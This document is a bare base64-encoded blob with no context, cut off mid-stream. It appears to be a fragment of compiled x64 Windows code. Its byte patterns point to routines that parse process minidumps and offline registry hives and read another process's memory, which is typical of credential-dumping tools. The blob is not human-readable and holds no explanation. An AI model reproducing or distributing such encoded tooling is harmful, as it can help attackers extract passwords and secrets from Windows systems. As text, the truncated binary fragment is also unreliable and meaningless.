IPsUEUz20iNBdU7DABJi/BIiUXoTYtAEEyLyUiLQQhBi/tMiV3gSIseTIlF8EyJXfhOjRQDTIlV2EQ5GHUiSItWCIsKhckPhN8AAACD6QF0coPpAXQug+kBdGiD+QN0Y0iLXSCLx/fYi8dIG8lII8tIi5wkiAAAAEiJThhIg8RQX15dw0iLSghIi9NIiwnoqwYAAEiJReBIhcB0xEiLVShMjUXgSItNIEUzyeg2////i/iFwHSqSIseSCtd4EgDXfjroUmL0LlAAAAA/xXpFAgASIlF4EiFwHSGTItGEEiNTeBIi9boxPz//4XAdCpIi1UoTI1F4EiLTSBFM8no5P7//4v4hcB0EEiLHkiLTeBIK9lIA1346whIi03gSItdIP8VzBQIAOk5////SIt1KEiNBDNIiUXQSTvCdzBJiwlMi8ZIi9PogP0HAEyLTSAz/0yLVdiFwEiLRdBAD5THSP/ASP/DSIlF0IX/dMtIi3UwSP/L6ez+///MzEyL3EmJWxBXSIPsQDPbSYlLIEiJGUiL+UiLSQjHRCRQCAAAAESLCUWFyXRYQYPpAXQzQYP5AnVgSItJCEmNQwiJXCQwRIvKSYlD4EUzwEmNQyC6i8EiAEiLCUmJQ9joKez//+szSItJCEG5ABAAAESJRCQgTIvCM9JIiwn/FTYTCADrEUWLyDPJQbgAEAAA/xU7EwgASIkHSDkfD5XDi8NIi1wkWEiDxEBfw8xAU0iD7EBMi9Ez20iLSQiLEYXSdEyD6gF0LIP6AnVVSItJCEUzyU2LArqPwSIAiVwkMEiJXCQoSIsJSIlcJCDonOv//+suSItJCEG5AIAAAEmLEkUzwEiLCf8VnRIIAOsRSYsKM9JBuACAAAD/FboSCACL2IvDSIPEQFvDSIlcJAhIiWwkEEiJdCQYV0FUQVVBVkFXSIPsIDP/SIvZSItJCEyL2kSL10SLAUWFwA+EygAAAEGD6AEPhKUAAABBg/gBD4XQAAAASItJCI13EIvWSIsJ6OACAABIi9BIhcAPhLMAAACLz0g5eAgPhqcAAACNbyREjXcYRI1/CESNZyBEjW8oRYXSD4WLAAAATIsHTDkDcj9Niw5LjQQBSDkDdzNJiwdBugEAAABJiUMIiwZBiUMQi0UAQYlDJEGLBCRBiUMgQYtFAEGJQyhNiQNNiUsY6wNEi9f/wYvBSDtCCHKj6zVIi0kIQbkwAAAASIsTTYvDSIsJ/xVxEQgA6w9IiwtBuDAAAAD/FWgRCABIg/gwRIvXQQ+UwkiLXCRQQYvCSItsJFhIi3QkYEiDxCBBX0FeQV1BXF/DzEiJXCQQV0iD7DBIi/lFM9JIi0kISYvZRIsZRYXbdChBg/sBdUJIi0kISI1EJEBFi8hIiUQkIEyLwkiLF0iLCf8VFxEIAOsOSIsPTI1MJED/FScRCABEi9CFwHQLSIXbdAaLRCRAiQNBi8JIi1wkSEiDxDBfw8zMzEiJXCQISIlsJBBIiXQkGFdBVkFXSIPsQEiLhCSAAAAATIv5i+oz202L8UmL8IsQjUtA/xUsEQgASIv4SIXAdFiL1Y1LQP8VGREIAEiJBkiFwHQ8SIl8JDi5AgEAAEyJdCQwTIvIx0QkKAAQAABEi8VJi9eJbCQg/xWHFQgAhcAPmcOF23UJSIsO/xUNEQgASIvP/xUEEQgASItsJGiLw0iLXCRgSIt0JHBIg8RAQV9BXl/DzEiJXCQISIl0JBBXSIPsMDP/SIvaSIvxjVcQjU9A/xWNEAgASIkDSIXAD4STAAAASCF8JChEjUcCIXwkIEUzyTPSSIvO/xWuDwgASIvISIsDSIkISIsDSIsISIXJdERIIXwkII1XBEUzyUUzwP8Vfg8IAEiLyEiLA0iJSAhIhcl0IUiLA0iLSAiBOU1ETVB1EriTpwAAZjlBBHUHvwEAAADrIEiLG0iLSwhIhcl0Bv8VTA8IAEiLC0iFyXQG/xUWEAgASItcJECLx0iLdCRISIPEMF/DTItJCDPARYtBDE0DwUE5QQh2E0mLyDkRdA//wEiDwQxBO0EIcvAzwMNIjQxAQYtEiAhJA8HDzMxIi8RIiVgISIloGEiJcCBIiVAQV0FUQVVBVkFXSIPsMDPbTYvpSYvwSIlcJCBMi9FEi9uNUwnojf///0yL+EiFwA+EwgAAAEiLaAhEi+NJA2oISDkYD4aoAAAASI14EEiLD0iJfCQoSDvxcg1Ii1cISI0ECkg78HIoTo0ELkw7wXINSItXCEiNBApMO8ByEkg78XNWSItXCEiNBApMO8B2SUg78XMITIvDSCvO6wlMi8ZMK8FIi8tNi/VMK/FLjQQGSDvCdgZMi/JNK/BIA0wkaEmNFChNi8boF/oFAEyLXCQgTQPeTIlcJCBIi0QkKEn/xEiDxxBIA2gITTsnD4Jc////TTvdD5TDSItsJHCLw0iLXCRgSIt0JHhIg8QwQV9BXkFdQVxfw0iLxEiJWAhIiWgQSIlwGEiJeCBBVEFWQVdIg+wgM+1Ii/pNi+BIi9lFM9sz9kUz0o1VCeho/v//SIXAdHFMi0AITANDCDPbTIswTYX2dF9IjVAQSIsKTIv6SDv5ciNMi0oISY0ECUg7+HMRTYvRTYvYTCvXSYvxTAPR6xpIO/lzGE2F23QoSI0ELkg7yHUfSItyCEwD1kiL6U071HMxTQNHCEj/w0iDwhBJO95ypTPASItcJEBIi2wkSEiLdCRQSIt8JFhIg8QgQV9BXkFcw0mLw+vcSIvESIlICEiJUBBMiUAYTIlIIFNVV0FWSIPsOEiDPcQzDAAASI1oEEiL2Q+E3AAAAOiyhf//SIlsJChMi8tIg2QkIABFM8Az0kiL+EiLCEiDyQLohDsGAEGDzv+FwEEPSMaFwA+OngAAAEyLBYczDABIiw14MwwASGPQSYvASCvBSP/ISDvQdkZIiw1YMwwASo0EAkiNHEUCAAAASI0UG0WNRgP/FTYMCABMiwVHMwwASIXASIsNNTMMAEwPRcNIiQUiMwwATIkFKzMMAOsHSIsFEjMMAEyLTCRgSI0USEwrwUiJbCQoSIsPSINkJCAA6B89BgCFwEEPSMaFwH4JSJhIAQXoMgwASItcJGBIiz3MMgwASIX/dCLoyoT//0UzyUiJbCQgTIvDSIvXSIsI6Lg5BgBIiz2lMgwASIvP6IlDBgBIg8Q4QV5fXVvDzMzMSIlcJAhIiXQkEFdIg+wgM9tIi/GL+0iFyXQdSI0VenAJAOilRgYASIv4SIXAdQlIiz1aMgwA6x1Iiw1RMgwASIXJdAXo+0MGAEiJPUAyDABIhfZ0BUiF/3QFuwEAAABIi3QkOIvDSItcJDBIg8QgX8PMzMxIiVwkEEiJdCQYVVdBVEFVQVZIi+xIg+xwSItBCDP/TYvQSIlFuEyL2kiNBdwxDABFM+RIiUXISDl9YEiL2UyLwUmL0kEPlMRJi8tIIX2wM/ZIIX3ATYvpiXUw6LD1//+FwA+EBQEAAEhjRVhEjXdASANDGEiLXVBIiUWwSDl1YHQoSIvTQYvO/xVWCwgASIlFwEiFwHQTTIvDSI1VsEiNTcDoMfP//0SL4EWF5A+EugAAAEiNVdBIjU2w6Az4//+FwA+ElgAAAItN9IvBg+APRIvB/8hBgeAA////g/gCdwhBvgQAAADrDYHh8AAAAP/Jg/k+dxpFC8ZMjU0wSIvTSI1NsOj/+P//hcB0UYt1MEyLw0iNTbBJi9XoufL//4v4hcB0I0iDfWAAdBxIi1Vwi01o/1VgTIvDSI1VwEiNTbDokvL//4v4hfZ0EkUzyUiNTbBEi8ZIi9Poqvj//0iLTcBIhcl0Bv8VrwoIAEyNXCRwi8dJi1s4SYtzQEmL40FeQV1BXF9dw0iJXCQISIl0JBhVV0FUQVZBV0iNbCTRSIHs4AAAAEiNBV8wDABFM/ZMIXWvM/9MIXWfTYvhSIlFt02L+EiJRaczwEiF0g+EiAEAAESLBc44DABEOQF3D0iL+Uj/wEiDwVBIO8Jy7EiF/w+EZAEAAEiLRxBIjRVqkgkASIlFr0G4AQAAAEiLRyAzyUiJRZ//FUgDCABIhcB0D0yLwEiNVf9Ji8/ofDsAAIXAD4QNAQAAg30DBA+C+gAAAESLRRsz0rk4BAAA/xVJCQgASIvwSIXAD4TOAAAAuhAAAACNSjD/FXcJCABIiUVnSIvYSIXAdBFMjUVnSIvWuQEAAADo+u///4XAD4TVAAAATI1Fv0mL1EiLy+iPCAAAhcB0akwhdCRATI1Nn4tFz0iNVa9EIXQkOItPGA8QRb9MIXQkMESLRwhIiUXvi0coiUQkKEiJTCQgSI1N3/MPf0Xf6Bj9//9Ei/CFwHQRSYvXSI0NM20JAOg++///6yP/FfYICABIjQ1XbQkA6w3/FecICABIjQ3obQkAi9DoGfv//0iLy+gx8P//6zr/FckICABIjQ26bgkA6xZIjQ1RbwkA6x3/FbEICABIjQ3ibwkAi9Do4/r//+sMSI0NknAJAOjV+v//TI2cJOAAAABBi8ZJi1swSYtzQEmL40FfQV5BXF9dw8zMSIlcJAhIiWwkEEiJdCQYV0iD7CBIi/KL6UiLErsEAADASIXSdBBFM8lFM8D/FVIMCACL2OtEvwAQAACL17lAAAAA/xUUCAgASIkGSIXAdCpFM8lEi8dIi9CLzf8VIwwIAIvYhcB5CUiLDv8VJAgIAAP/gfsEAADAdMFIi2wkOIvDSItcJDBIi3QkQEiDxCBfw8zMzEiLxEiJaAhIiXAQSIl4IEFWSIPsIEiDYBgASIvqTIvxSI1QGLkFAAAA6D7///+L8IXAeCxIi3wkQEiLz+sNgz8AdBKLB0gD+EiLz0iL1UH/1oXAdelIi0wkQP8VoAcIAEiLbCQwi8ZIi3QkOEiLfCRISIPEIEFew0iJXCQIV0iD7CBIi9pIi/lIixJIg8E4QbAB/xXwCwgARA+2wDPARIlDEEWFwHQKTItDCItPUEGJCDlDEEiLXCQwD5TASIPEIF/DzMxMi9xTSIPsUEmJU+BJjUPISIvRSYlD2DPbSY1LyIlcJED/FZULCABIjVQkMEiNDYH////oBP///4XAD0lcJECLw0iDxFBbw8xIi8RIiVgQSIlwGEiJeCBVQVRBVUFWQVdIjagY////SIHswAEAAEiDZCRgAEiNBbEsDABIg2QkUABIi/FIg6XwAAAAAEG+AQAAAEiJTCRYTYvgSIlMJDhMi+qLCbs1AQDASIlEJGhBi/6FyQ+E4wMAAEErzg+EeQEAAEErzg+EzAAAAEE7znQKuwIAAMDpswQAAEiNlfAAAAC5CwAAAOi9/f//i9iFwA+ImAQAAEiLtfAAAABIjUQkIEUz9kiJRCRIRDk2D4Z7BAAAhf8PhHMEAABBi8ZIacgoAQAASItEMRhIiUQkMItEMSCJRCRAD7dEMS5IA8FIjU4wSAPIdENIg8r/SP/CgDwRAHX36Gs8AABMi/hIhcB0KUiL0EiNTCQg/xVNCggAg2QkRABIjUwkMEmL1EH/1UmLz4v4/xWyBQgAQf/GRDs2coDp9gMAAEiLTghIjUQkIEiJRCRIugQAAABIiwnodvX//0yL8EiFwA+EzwMAADPbORgPhsMDAACF/w+EuwMAAIvLSGvRbEqLRDIESIlEJDBCi0QyDIlEJEBIi0YIRotEMhhIiwhMA0EIdDS6XAAAAEmNSATo6+wFAEiNTCQgSI1QAv8VpAkIAEiNTCQw6I4DAABJi9RIjUwkMEH/1Yv4/8NBOx5ykulQAwAASI1EJCBFM8BIjVWASIlEJEhIi87oaAQAAIXAD4QxAwAASI2FgAAAAEG/QAAAAEiJRCRgSI1UJFBIi0WYSI1MJGBFi8dIiUQkUOhv7P//hcAPhPwCAABIi42gAAAASItdmEiDwfBIg8MQ6b4AAACF/w+EvwAAAEiNReBIiUwkUEiNTCRgSIlEJGBBuGgAAABIjVQkUOgk7P//i/iFwA+EgQAAAEiLRRBBi88PEEU4SIlEJDCLRSCJRCRAZkgPfsBIwegQD7fQDxFEJCD/FfgDCABIiUQkKEiFwHRJRA+3RCQiSI1UJFBIiUQkYEiNTCRgSItFQEiJRCRQ6L/r//+FwHQXSI1MJDDoaQIAAEmL1EiNTCQwQf/Vi/hIi0wkKP8V3QMIAEiLTfBIg8HwSDvLD4U5////M9uF/w+EEwIAAEWLxkiNVCRwSIvO6DIDAACFwA+E+wEAAEiNRVBBuCQAAABIiUQkYEiNVCRQi0QkfEiNTCRgSIlEJFC7DQAAgOg66///hcAPhMcBAACLRWSLXCR8SIPoCEiDwwzptAAAAIX/D4SpAQAASI1NoEiJRCRQSIlMJGBIjVQkUEiNTCRgQbg0AAAA6PPq//+FwHR+i0W4QYvPSIlEJDCLRcCJRCRAD7dFzGaJRCQgD7dFzovQZolEJCL/Fc8CCABIiUQkKEiFwHRIRA+3RCQiSI1UJFBIiUQkYEiNTCRgi0XQSIlEJFDol+r//4XAdBdIjUwkMOhBAQAASYvUSI1MJDBB/9WL+EiLTCQo/xW1AggAi0WoSIPoCEg7ww+FQ////+nvAAAARTPASI1VgEiLzugRAgAAhcB0VUiLRZhIi1gg6zyF/3RFSItDMEiNTCQwSIlEJDCLQ0CJRCRASI1DWEiJRCRI6NAAAABJi9RIjUwkMEH/1UiLWxCL+EiLRZhIg+sQSIPAEEg72HW3M9tIjUQkIEiJRCRIhf90e4XbeHdFi8ZIjVQkcEiLzuiWAQAAhcB0Y4tEJHyLWBTrS4X/dFSLQxhIjUwkMEiJRCQwi0MgiUQkQA+3QyxmiUQkIA+3Qy5miUQkIotDMEiJRCQo6EYAAABJi9RIjUwkMEH/1YtbCIv4i0QkfEiD6whIg8AQSDvYdagz20yNnCTAAQAAi8NJi1s4SYtzQEmLe0hJi+NBX0FeQV1BXF3DQFNIg+wgSI1UJDBIi9no/QEAAIXAdBdIi0wkMItBCIlDFEiDxCBbSP8lXgEIAINjFABIg8QgW8NIiVwkCFdIg+wgSIvaSIv5SIsSQbABSItJGP8VvAUIAEQPtsAzwESJQxBFhcB0FEyLQwgPEAdBDxEADxBPEEEPEUgQOUMQSItcJDAPlMBIg8QgX8MPEAEzwA8RAg8QSRAPEUoQw8zMzEyL3EmJWwhXSIPsUDPbTYlD4EmNQ8hIi/lJiUPYiVwkQEiF0nQoSY1LyP8VPAUIAEyNRCQwSIvPSI0VWf///+i0+f//hcB4F4tcJEDrEUiNFZf////onvn//4XAD5nDi8NIi1wkYEiDxFBfw0iJXCQISIl0JBBVV0FUQVZBV0iL7EiB7IAAAAAz20WL+IM5AUiL8kiL+XUJSItBCEyLEOsJ/xXV/wcATIvQSIl1wEiNBScmDABIiUXISIldsEiJfbhFhf90E7oaAAAATI1F2ESNcu5EjWL26xBBvjAAAABMjUXQi9NFjWbwiw+FyXRhg/kBdT5IjUVARYvOSYvKSIlEJCD/FaMDCACFwHglRDl1QHUfSItF2EiFwHQWTYvESIlFsEiNVbBIjU3A6Hjn//+L2EyNnCSAAAAAi8NJi1swSYtzOEmL40FfQV5BXF9dw0WF/3Wf/xVZAwgAQY1fAQ8QAA8RBg8QSBAPEU4Q68PMSIvESIlYCEiJcBBIiXgYVUiNaKFIgeyQAAAAM9tIjUUXSCFd90iL8kghXQdIi/lIiUXnSIvRSI0FLyUMAEiJRe9EjUNASIlF/0iLQQhIjU3nSIlFD+je5v//hcAPhJ4AAAC4TVoAAGY5RRcPhY8AAABIY0VTjUtASAMHjXsYi9dIiUUH/xW6/gcASIlF50iFwHRtRIvHSI1VB0iNTefoleb//0iLReeNS0C6CAEAAESNSkRmRDlIBESNQvBBD0TQi/r/FXz+BwBIiUX3SIXAdCVEi8dIjVUHSI1N9+hX5v//SItN94vYhcB0BUiJDusG/xWG/gcASItN5/8VfP4HAEyNnCSQAAAAi8NJi1sQSYtzGEmLeyBJi+Ndw8xMi9xJiVsQSYlrGFZXQVRBVkFXSIPsQA8QAYvySI0FLSQMAEUz9kmJQ8BNIXO4SY1TCPMPf0QkMEmL+U2L+EyL4eie/v//hcAPhLIAAABIi4wkkAAAAEiLXCRwSIXJdAcPt0MEZokBuEwBAABmOUMEdQqLTPN8i3TzeOsOi4zzjAAAAIu084gAAABNhf90A0GJN0iF/3QCiQ+F9nRahcl0VkiLvCSYAAAASIX/dEmL6YvRuUAAAAD/FWv9BwBIiQdIhcB0MovWSI1MJCBJAxQkRIvFSIlUJDBIjVQkMEiJRCQg6DXl//9Ei/CFwHUJSIsP/xVp/QcASIvL/xVg/QcATI1cJEBBi8ZJi1s4SYtrQEmL40FfQV5BXF9ew0iLxEiJWAhIiXAQSIl4GEyJcCBBV0iB7NAAAABFi/hIi/KL+UUz9jPSSI1IiEGDzxBBjV5oRIvD6B/vBQCJXCRgTDm0JCABAAB0CkiLnCQgAQAA6xG6GAAAAI1KKP8VqfwHAEiL2EiLzuh6LQYASIvwSIXAD4QbAQAAhf8PhJgAAACD7wF0WYP/AQ+FwQAAAESLjCQAAQAASI1EJGBMi4QkGAEAAEiLlCQQAQAASIuMJAgBAABIiVwkUEiJRCRITCF0JEBMIXQkOESJfCQwSIl0JChMIXQkIP8VPvUHAOtuSIlcJFBIjUQkYEiJRCRIRTPJTCF0JEBMi8ZMIXQkODPSRIl8JDAzyUQhdCQoTCF0JCD/Ffz0BwDrNEiJXCRISI1EJGBIiUQkQEUzyUwhdCQ4RTPATCF0JDBIi9ZEiXwkKDPJRCF0JCD/Fe76BwBEi/CDvCQoAQAAAHULSIO8JCABAAAAdSdIi0sI/xXE+wcASIsL/xW7+wcASIO8JCABAAAAdQlIi8v/Fbf7BwBIi87o1ywGAEyNnCTQAAAAQYvGSYtbEEmLcxhJi3sgTYtzKEmL40Ffw8zMSIlcJAhIiVQkEFVWV0FUQVVBVkFXSIvsSIHsgAAAAEiNRbhNi+hIiUQkKEyNTVhIjUXAM9JMjUWwSIlEJCBMi/lBvgEAAADo4Pz//4XAD4T4AAAASYtHCDP2SItduEiJRehIiUX4OXMUD4bUAAAARItlWIt9sEWF9g+ExAAAAItLHCvPRIvGScHgAkkDyIsUGYXSD4SfAAAAi0McRTPJSQMHSQPATIlN0EiJReBFM8BEIUXIjUYBiUXERDlDGHY+TYXJdTlFhfZ0NItLJCvPSAPLQg+3BEE78HUai0sgK89IA8tGiwyBRCvPRIlFyEwDy0yJTdBB/8BEO0MYcsI713IaQo0EJzvQcxJIg2XwACvXi8JIA8NIiUXY6w9Ii8JJAwdIg2XYAEiJRfBJi9VIjU3A/1VIRIvw/8Y7cxQPgjP///9Ii8v/FUD6BwAzwEiLnCTAAAAASIHEgAAAAEFfQV5BXUFcX15dw8zMzEiJXCQQSIl8JBhVSIvsSIPsYEiDZcAASI1FEEiDZfgATI1F4EiL+UiJRdBIjQ3eHwwAxkUQAEiJTci6AQAAAEiJTdhIjU3QSIsHSIlF4EiLRwhIiUXoSMdF8AQBAADoseP//4XAdD9Ii134uUAAAABIKx9IjVMB/xVr+QcASIlFwEiFwHQkTI1DAUiL10iNTcDoRuH//4XAdQxIi03A/xV8+QcA6wRIi0XATI1cJGBJi1sYSYt7IEmL413DTIlEJBhIiVQkEFVTVldBVEFVQVZBV0iNbCThSIHsuAAAAEiDZZcASI1Fb0iDZacATIvhSIlFt0iNDRYfDABIjUVnSIlNv0iJRcdBvQEAAABJi0QkCEUzyUiJRZ9FM8BIiUWvQYvVSIlF/0iJRQ9IjUV/SIlEJChIjUXXSIlNz0mLzEiJRCQg6Hj6//+FwA+EUAEAALhMAQAAZjlF13UMRY19A0G+AAAAgOsQQb8IAAAASb4AAAAAAAAAgEiLfX9Ii9+DPwAPhBABAABIi313RYXtD4T/AAAAi0MMSI1Np0kDBCRIiUWn6Fj+//9IiUXfSIXAD4TRAAAAiwNJAwQkSIlFl4tDEEkDBCRIiUX3QYv3RYvH6ZIAAABMi8ZIjVX3SI1Nx+j33///hcAPhI8AAABIi01vSIXJD4SCAAAASItFZ0iFwHR5SIlFB0yF8XQNSINl7wAPt8GJRefrHUiDwQJJAwwkSIlNp0iNTafo0v3//4Nl5wBIiUXvSIvXSI1N1+haQAUASItN70SL6EiFyXQG/xXM9wcASAF1l0yLxoNlcwBIAXX3g2VrAEiNVZdIjU236Gjf//+FwA+FWf///0iLTd//FZr3BwBIg8MUgzsAD4X4/v//SIt9f0iLz/8VgPcHALgBAAAASIHEuAAAAEFfQV5BXUFcX15bXcPMzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+wwSYsBM/9Ji/FBi+hMi/KJCIXJD4QWAQAAg/kBD4UCAQAAjVcgjU9A/xXm9gcASIvISIsGSIlICEiFyQ+E4wAAAEiL2EiJfCQoi8WJfCQg99hJi85FG8BFM8lBg+ACM9JBg8AC/xXy9QcASIvISItDCEiJCEiLQwhIOTgPhKMAAABIiwj33UiLHhvSSIl8JCCD4v5FM8mDwgRFM8D/FbL1BwBIi8hIi0MISIlICEiLQwhIi0gISIXJdGqBOXJlZ2Z1RDl5HHU/SIHBABAAAIE5aGJpbnUwSIlIEEhjQQRIg8EgSAPISItDCEiJSBhIi0MISItIGLhuawAAZjlBBHUG9kEGDHUpSItLCEiLSQj/FVD1BwBIiwZIi0gISIsJ/xUY9gcASIsO/xUf9gcA6wW/AQAAAEiLXCRAi8dIi3wkWEiLbCRISIt0JFBIg8QwQV7DzMzMQFNIg+wgSIvZSIXJdEiDOQF1NEiLQQhIhcB0K0iLSAhIhcl0Bv8V5fQHAEiLQwhIiwhIhcl0Bv8Vq/UHAEiLSwj/FbH1BwBIi8tIg8QgW0j/JaL1BwAzwEiDxCBbw8zMSIlcJBBEiUwkIFVWV0iD7EBIi7wkiAAAADPbSIvxRYvZSYvoTIvSSCEfiwmFyQ+EFwEAAIP5AQ+FOwEAAEiF0nUISItGCEyLUBi4bmsAAGZBOUIED4XnAAAASIXtD4TbAAAAQTlaGA+E1AAAAEGDeiD/D4TJAAAASItGCLpcAAAASWNaIEiLzUgDWBBIiVwkYOhq3QUASIlEJDBIhcAPhIcAAABIK8W5QAAAAEjR+EgDwEiJhCSIAAAASI1QAv8VnPQHAEiL2EiFwHR1TIuEJIgAAABIi9VIi8jo0d8FAEiLVCRgTIvDSIvO6JkAAABIiQdIi9BIhcB0JouEJIAAAABIi85Mi0QkMESLTCR4SYPAAkiJfCQoiUQkIOjg/v//SIvL/xVv9AcA6xZMi8VIi9NIi87oTwAAAEiJB+sDTIkXM9tIOR8PlcPrLUSLjCSAAAAARYvDSIvVSIl8JCBJi8r/FSHtBwCFwA+Uw4XbdQiLyP8VEPMHAIvDSItcJGhIg8RAX15dw8xIiVwkCEiJbCQQSIl0JBhXQVRBVUFWQVdIg+wgD7dCBEUz7U2L4EyL8kyL+UGL7T1sZgAAdAs9bGgAAA+FnwAAAEGL9WZEO2oGD4ORAAAASIXtD4WIAAAAi8ZJY1zGCEmLRwhIA1gQuG5rAABmOUMEdV/2QwYgD7dTTHQOSI1LUOgTKgAASIv46yhIg8ICuUAAAAD/FT/zBwBIi/hIhcB0MEQPt0NMSI1TUEiLyOh23gUASIX/dBpIi9dJi8zofiQGAIXASIvPSA9E6/8VP/MHAEEPt04G/8Y78Q+Cb////0iLXCRQSIvFSItsJFhIi3QkYEiDxCBBX0FeQV1BXF/DSIvESIlYCEiJaBBIiXAYSIl4IEFWSIPsYDPtTIvSixFJi/FNi/BMi8mL/YXSD4TcAAAAg/oBD4VHAQAATYXSdQhIi0EITItQGLhuawAAZkE5QgRAD5THZkE5QgQPhSEBAABIi4wkmAAAAEiFyXQGQYtCGIkBSIuMJKAAAABIhcl0CEGLQjjR6IkBSIuMJLAAAABIhcl0BkGLQiiJAUiLjCS4AAAASIXJdAhBi0JA0eiJAUiLjCTAAAAASIXJdAZBi0JEiQFIhfYPhLUAAABBD7dCTovY0etNhfZ0Lzkei/1AD5fHOR52I0ljUjREi8BJi0EISItIEEiDwQRIA9FJi87oIt0FAGZBiSxeiR7rdEiLhCTAAAAARTPJSIlsJFhMi8ZIiWwkUEmL1kiJRCRISYvKSIuEJLgAAABIiUQkQEiLhCSwAAAASIlEJDhIi4QkoAAAAEiJbCQwSIlEJChIi4QkmAAAAEiJRCQg/xWn6gcAhcBAD5THhf91CIvI/xV98AcATI1cJGCLx0mLWxBJi2sYSYtzIEmLeyhJi+NBXsNIiVwkCEiJbCQQSIl0JBhXQVRBVUFWQVdIg+wgSIvyTYvoM9JMi/mL+kiF9nUISItBCEiLcBi4bmsAAGY5RgQPhdkAAACLTiiFyQ+EzgAAAIN+LP8PhMQAAABJi0cIRIvyTGNmLEwDYBCFyQ+ErQAAAEiF/w+FpAAAAEGLxkljXIQESYtHCEgDWBC4dmsAAGY5QwR1fE2F7XRvD7dDBmaFwHRu9kMUAQ+30HQOSI1LGOhDJwAASIvo6ypIg8ICuUAAAAD/FW/wBwAz0kiL6EiFwHQ+RA+3QwZIjVMYSIvI6KTbBQAz0kiF7XQmSIvVSYvN6KohBgCFwEiLzUgPRPv/FWvwBwAz0usIZjlTBkgPRPtB/8ZEO3YoD4JT////SItcJFBIi8dIi2wkWEiLdCRgSIPEIEFfQV5BXUFcX8PMzEiJXCQISIl0JBBIiXwkGEFWSIPsMESLCTP/TYvQTIvaTIvxRYXJdHBBg/kBD4WeAAAA6In+//9IhcBAD5XHhf8PhIoAAACLWAhIi3QkcA+68x9IhfZ0eUiLTCRoSIXJdDMz/zkeQA+TxzkecieDeAgAfQZIjVAM6xNMY0AMSYtGCEiLUBBIg8IESQPQRIvD6LTaBQCJHus4SItEJHBFM8lIiUQkKEUzwEiLRCRoSYvSSYvLSIlEJCD/FVLoBwCFwEAPlMeF/3UIi8j/FVDuBwBIi1wkQIvHSIt8JFBIi3QkSEiDxDBBXsNIiVwkCFdIg+wwRIsJM9tNi9BMi9pIi/lFhcl0d0GD+QEPhaQAAADorP3//0iLyEiFwA+EkwAAAESLTCRwi1AIRIvCQQ+68B9FO8EPk8NFO8FyOotEJGCB4gAAAIBBC9GJQRCJUQh9BkiDwQzrE0hjUQxIi0cISItIEEiDwQRIA8pIi1QkaOjV2QUA6z65MgAAAOsxi0QkcEUzwESLTCRgSYvSiUQkKEmLy0iLRCRoSIlEJCD/FYbnBwCFwA+Uw4XbdQiLyP8Vbe0HAIvDSItcJEBIg8QwX8NIi8RIiVgISIloEEiJcBhIiXggQVRBVkFXSIPsQESLEUUz5EWL2E2L8UiL6kGL/EWF0g+EBQEAAEGD+gEPhTgBAABEOWIYD4QuAQAARDtaGA+DJAEAAIN6IP8PhBoBAABIi0EISGNKIEyLQBBJA8gPt0EEPWxmAAB0Cz1saAAAD4X1AAAAZkQ5YQYPhOoAAAAPt0EGRDvYD4PdAAAASmNU2Qi4bmsAAEkD0GY5QgQPhcYAAABNhfYPhL0AAABIi7QkgAAAAEiF9g+ErAAAAPZCBiB0Ow+3Wkw5HkAPl8c5HnZOSI1KUIvT6AskAABIi+hIhcB0O0yNBBtIi9BJi87ohNgFAEiLzf8VY+0HAOshD7daTNHrOR5AD5fHOR52EUQPt0VMSIPCUEmLzuhY2AUAhf90BWZFiSReiR7rPUyLjCSAAAAATYvGTIlkJDhBi9NMiWQkMEiLzUyJZCQoTIlkJCD/FQjmBwCFwEAPlMeF/3UIi8j/FebrBwBIi1wkYIvHSIt8JHhIi2wkaEiLdCRwSIPEQEFfQV5BXMPMSIlcJAhIiWwkEEiJdCQYV0FUQVVBVkFXSIPsQEUz7UWL2EyL0k2L4YsRTIv5QYv1hdIPhJABAACD+gEPhdwBAABNhdJ1CEiLQQhMi1AYuG5rAABmQTlCBA+FvwEAAEU5aigPhLUBAABFO1ooD4OrAQAAQYN6LP8PhKABAABIi0EISWNKLEgDSBBKY1yZBEgDWBC4dmsAAGY5QwQPhXwBAABNheQPhHMBAABMi7QkkAAAAE2F9g+EYgEAAA+3QwZmhcAPhIMAAAD2QxQBD7f4D7fQdBD/x0iNSxjofSIAAEiL6Osw0e9Ig8ICuUAAAAD/x/8VpesHAEiL6EiFwA+EGgEAAEQPt0MGSI1TGEiLyOjY1gUASIXtD4QAAQAAQTk+QA+TxkE5PnIXRIvHSIvVTQPASYvM6LLWBQCNR/9BiQZIi83/FYvrBwDrA0WJLoX2D4THAAAAi3sISIuMJKAAAAAPuvcfSIXJdAWLQxCJAUyLtCSwAAAATYX2D4SdAAAASIuMJKgAAABIhcl0NkE5PkGL9UAPk8ZBOT5yJ0Q5awh9BkiNUwzrE0mLRwhMY0MMSItQEEiDwgRJA9BEi8foKdYFAEGJPutVSIuEJLAAAABNi8RMi4wkkAAAAEGL00iJRCQ4SYvKSIuEJKgAAABIiUQkMEiLhCSgAAAASIlEJChMiWwkIP8VseMHAIXAQA+UxoX2dQiLyP8Vp+kHAEyNXCRAi8ZJi1swSYtrOEmLc0BJi+NBX0FeQV1BXF/DzMzMQFNIg+wgRIsBM9tFhcB0C0GD+AF1H0GL2OsaSIvK/xWA4wcAhcAPlMOF23UIi8j/FU/pBwCLw0iDxCBbw8zMzEiLxEiJWAhIiWgQSIlwGFdIg+xQSI1A6EmL6UiJRCQoM/YhcEBFM8nHRCQgGQACAEiL+eiE9P//hcAPhMkAAABIi1QkQEiNhCSAAAAASIlEJDBMi8VIIXQkKEiLz+jC+f//hcAPhIQAAACLhCSAAAAAhcAPhIEAAACL0I1OQP8VmOkHAEiLnCSIAAAASIkDSIXAdGZIi1QkQEiNjCSAAAAASIlMJDBMi8VIi89IiUQkKOhu+f//i/CFwHQYSIuUJJAAAABIhdJ0MYuMJIAAAACJCusmSI0NAVIJAOiU2///SIsL/xVr6QcASIkD6wxIjQ2XUgkA6Hrb//9Ii1QkQEiLz+i5/v//6wxIjQ0sUwkA6F/b//9Ii1wkYIvGSIt0JHBIi2wkaEiDxFBfw0iLxEiJWAhIiWgQSIlwGEiJeCBBVkiD7CBBi/iL6kyL8UmL8blAAAAAjVcQ/xW+6AcASIvYSIXAdCFMiTCJaAiF/3QXSIX2dBJEi8eJeAxIjUgQSIvW6OXTBQBIi2wkOEiLw0iLXCQwSIt0JEBIi3wkSEiDxCBBXsPMzMxIi8RIiVgQSIlwGEiJeCBVQVRBVUFWQVdIjWihSIHssAAAAEiLQQhIjX0XRTPkSIlF70iJRQ9Mi+pIjQVcDgwATIll50iJRd9Ii/FIiwFBi9xIiUX3QY1MJECLQgyDwDBMiWUHTYXAi9BMiWXXSQ9F+EyJZf9Ei/j/FfbnBwBMi/BIhc